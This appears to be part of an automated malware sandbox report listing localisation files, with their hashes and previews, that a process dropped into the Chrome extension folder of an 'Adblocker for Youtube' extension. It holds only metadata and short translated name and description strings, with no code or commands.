Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\he\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\hu\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):156
Entropy (8bit):4.967518278690115
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWEGKQ2gBBVR7WHOAXACTAAhFEBknfJfTfmZWEGKQ2gBHMk6kL0Y:bk/dP6Gmd4VR74XroknfJypdEMC0Y
MD5:10461FD634DC768A6B93196B0879FD0F
SHA1:620AFFCA1A6EA63FA015783D367BB264A2DDA8D1
SHA-256:FF48B5761FE27245CD49308014EEC10BF057B395846A4E1091B13458CCD84848
SHA-512:B7E925A0DF6C5E84FE764AA2EDA44E29D1B2A6B40AFDCAD3C21055E0D6C7E4E3274503BB821D03CFF0AD76EBB09C7C0DB1DA8695DAA207191A463C149AEE8A8F
Malicious:false
Preview:.{"appName":{"message":"Adblocker a Youtube."},"appDesc":{"message":"Keres vide. adblock? .gy a let.lt.s Adblocker a Youtube.szolg.ltat.sban."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\id\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\it\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.793805282505165
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHWREEmiKjKFCiQpEWpKZWVAVqBT1n:bk/dP6GtVR7yEmwFXjWky1
MD5:4CF617F75C36EF8C5C566F7E9689A123
SHA1:2F8E9DA815F05E4A3F9F70B2C103DAAB3E27069E
SHA-256:2603AA798E78D7DC60EB166545436A264658F7B1B6B4B7436D367A969033B263
SHA-512:D857DBCBE5359F222B7922D784B1E795BF28D5A81A9FFEA1AB5DAF8F63408F9A3F580CC6D22DE68C267E88FDB03141D3FD85162FB1C8A9FB8C1E2562D1DE5AD2
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Stai cercando video adblock? Quindi, scaricare Adblocker per Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ja\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\kn\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ko\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lt\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.915447629764539
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWQeDl8K5gBZYK/R7WHM+O3eC4omW+FkkW5Hb+511n:bk/dP6Gyyl826R7IOuNo+Fsa
MD5:1AD07246758F88714FD02AEE442F86EC
SHA1:64CC12DF3A673E2673F55C3D0D7683B5D8DF99BD
SHA-256:4F19A929F71B3A20E145B12B61377E610D70CA1A020CEE8D0E8EBF38D7F1F0CA
SHA-512:2D7BBF619D25C382B6357372CA7A29DA22B682FC3B12795A83654DFE109EB1CCB81E4D7304354A9B3AC324C7D9822E0A81563CA8920BC06DFFA733BA3C849168
Malicious:false
Preview:.{"appName":{"message":"Adblocker u. \" Youtube.\""},"appDesc":{"message":"Ie.kote video adblock? Kad parsisi.sti Adblocker \"Youtube\".."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\lv\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.9824655648065
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHTfPIOJ5itFC/hqQ5hHHB2W8xBT1n:bk/dP6GeRVR7SfPzJ8tFIdFBWj1
MD5:C903EB1F9762BB428DF73858E79FC5C6
SHA1:D367BEF71658D76611A2E7F0E5FA3F8AAC3EBE43
SHA-256:BD607C80998190DE84D4D5610A2B8F4BCEE0D9500BC753DDFEB0B5A94F4DD4AE
SHA-512:1EC0115709D39F34C503F383B896442B4D34A5529F142D352A1ED94F4D275BAD3385EA9ADD4B5035E9BCAFA46452FF25C0C8074606200B29E627430E9D333AD0
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Vai j.s mekl.jat video adblock? Lai lejupiel.d.tu Adblocker Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):194
Entropy (8bit):4.959575701188163
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW1SfGKgBBVR7WHVxEdO9aX1jF0l1V1yVF1Gv1lhaiVVfoEgGqOTg:bk/dP6G7RVR7UxEUYXPdvYv88VQEoRj1
MD5:711BE6153463FB924A8CB817DC59DCEC
SHA1:13CB5590E37FC03385875640AB40D87C8640DB7E
SHA-256:28DF1E64F5E5EE71277B6C154A7905F11C20C6C1115433DF23485FAE299AD7AE
SHA-512:7B276E3675D004A3337D0F38F828D7BB4AB8E2F23C2BEDFE29496DC700C71E62727C20533BBF0A45F9119A452404D2658B63F6A7BB1052DA7F862024F32AD0EE
Malicious:false
Preview:.{"appName":{"message":"Adblocker .. Youtube."},"appDesc":{"message":".... ... .. ....... .. ..... adblock? .... ......... Adblocker .. Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ml\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\mr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ms\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\nl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.778562590537941
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWToFBBVR7WHHaQgFfqFG3C3C4pIHWWToFBT1n:bk/dP6G+VVR7GaQK3a62f1
MD5:7EECC4311200A6726C4EDFCEEAEF1220
SHA1:A97F8C0E81CACCC9FA581DC44DA73E7234DC53A0
SHA-256:EA3C7300E6523FE08C28F073E7A34D043467E6EED330A031BC23CADA905762DC
SHA-512:2DCE3EA0649FD1946C40AAB054CBF37CA3E7EEE66DB0A8A0335F0BE3C0622A5C1714C7312A8BCE92667EF955845AC4E78E7B4B83D3C96DD425371EE9A77F5E70
Malicious:false
Preview:.{"appName":{"message":"Adblocker voor Youtube."},"appDesc":{"message":"Bent u op zoek voor video adblock? Dus download Adblocker voor Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\no\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.887676383355589
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHA0Fn8RRrdCg1JEWG/WDMF8xBT1n:bk/dP6G5VR7gn0JV1JE61
MD5:CE1C94D6CE80894AC99A2E9076B30B7C
SHA1:BB67FF27CB03C4DE720390BD03B417E96DC8B4AB
SHA-256:DA8F186B15A95192E69A3924545DE56516C7618236E85BD2C84AB3AAD8B117FB
SHA-512:D713C90E9B670CBDC2C2BE8C5F0080FDF93A7CA8B2BFE5D3410B452FE68BBFDEC98A9A6DD3CA13146ED6B0AD9B28A3A97D27B8E044A5758949B185531BB619DA
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Er du p. jakt etter video adblock? S. last ned Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_BR\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\pt_PT\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ro\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ru\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):262
Entropy (8bit):4.5033681386610525
Encrypted:false
SSDEEP:6:bk/dPeARd/5yXZEcVR7U95DRd/2XfUbvYfWbsRd/5yXZ0Y:4dmARh5cekFU9lRhSfUEW4Rh5cKY
MD5:CA49D076ACD74F2FAF38C51BB94A7655
SHA1:3CFC0948599DEA9B054019A27B4EAC0EC0546EF1
SHA-256:506CFB234C07A5087B7522469415660710FD9112BEFFFF2008C6E68DC05F0A3B
SHA-512:ADCCDD574363EC1E01D903496A1F7E4C50AC65AAB82C564B14D0749FDE22A7C0FD1FD25DF809B3FCEE0235CA1FEED6EF2DCE8D9E225758178B9F21D77D7D5C27
Malicious:false
Preview:.{"appName":{"message":"........... ....... ... ......"},"appDesc":{"message":"..... ........... ..... .......? ..... ......... ........... ....... ... ......."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):143
Entropy (8bit):5.010701769608737
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWLt2gBBVR7WHNhbAyA2eCnngXR3L1hxJMWLt2gBT1n:bk/dP6GlVR7Mh8p3+gB3pXX1
MD5:A43FFF6CFE872C583DB062871D25CA36
SHA1:37F424E9CAF6604C494CFE5852939928579D57F3
SHA-256:4988A2D80C4F9E21C5C1614E3499C85A363E945D1288BC855A4A716A7FA5CA20
SHA-512:8C83C839805402FBDA12B27E9730E3815A286A37A6880202068C23F74603FE970ED3BF4C03F6F7AA194909E33AD2FA9A1DA21AA3F2D2A04516FD719DA565A6B0
Malicious:false
Preview:.{"appName":{"message":"Adblocker na Youtube."},"appDesc":{"message":"H.ad.te video adblock? Tak.e stiahnu. Adblocker na Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sl\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):138
Entropy (8bit):4.923079352507677
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWft2gBBVR7WHMgE/RAFJeCnnGF6JMWft2gBT1n:bk/dP6G5VR7y7i+S6j1
MD5:D8084714517DD44C55C4CD0F73A2B0BD
SHA1:ED51C0EE20DDF94E3ED1E2F95FDBE62921098B96
SHA-256:B0F22F0F3C8361CAD77040ACD0FBFC8904D697F108119F0CAC61C35243EA0729
SHA-512:DAA57D28D044C594F85B5FA0A22FD7498165904861CCD33AC84F58314AB3414618F08C67D58E3473C8CF67C97588E6D69FE68C401360B55E24BB2C2725414083
Malicious:false
Preview:.{"appName":{"message":"Adblocker za Youtube."},"appDesc":{"message":"I..ete video adblock? Tako prenesi Adblocker za Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sq\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):171
Entropy (8bit):4.969371046083134
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVmBFBBVR7WHPaDFJDwOSC47/MSLJMWVmBFBT1n:bk/dP6GwVVR7OmsOSNzMpf1
MD5:BED2C5E327380FAD31DD34DFF7874A74
SHA1:86AC1C9F97B35A01B340C0B1ADB2529517F2B641
SHA-256:481D2C35471F8C852438AD51BD45B237FCD29A6FF859AD7EC25D4F195FA17B13
SHA-512:B308D0F1F61B179D2F7CAABCCBA2488FAE4FF50A8A186F4EAB8E7B0F0AC1C14B38EE44DA6D76E6234BF119965BA03B30D72524A4838FB6A9952BE2CD9AC8656B
Malicious:false
Preview:.{"appName":{"message":"Adblocker p.r Youtube."},"appDesc":{"message":"Ju jeni n. k.rkim p.r video adblock? K.shtu q. t. shkarkoni Adblocker p.r Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
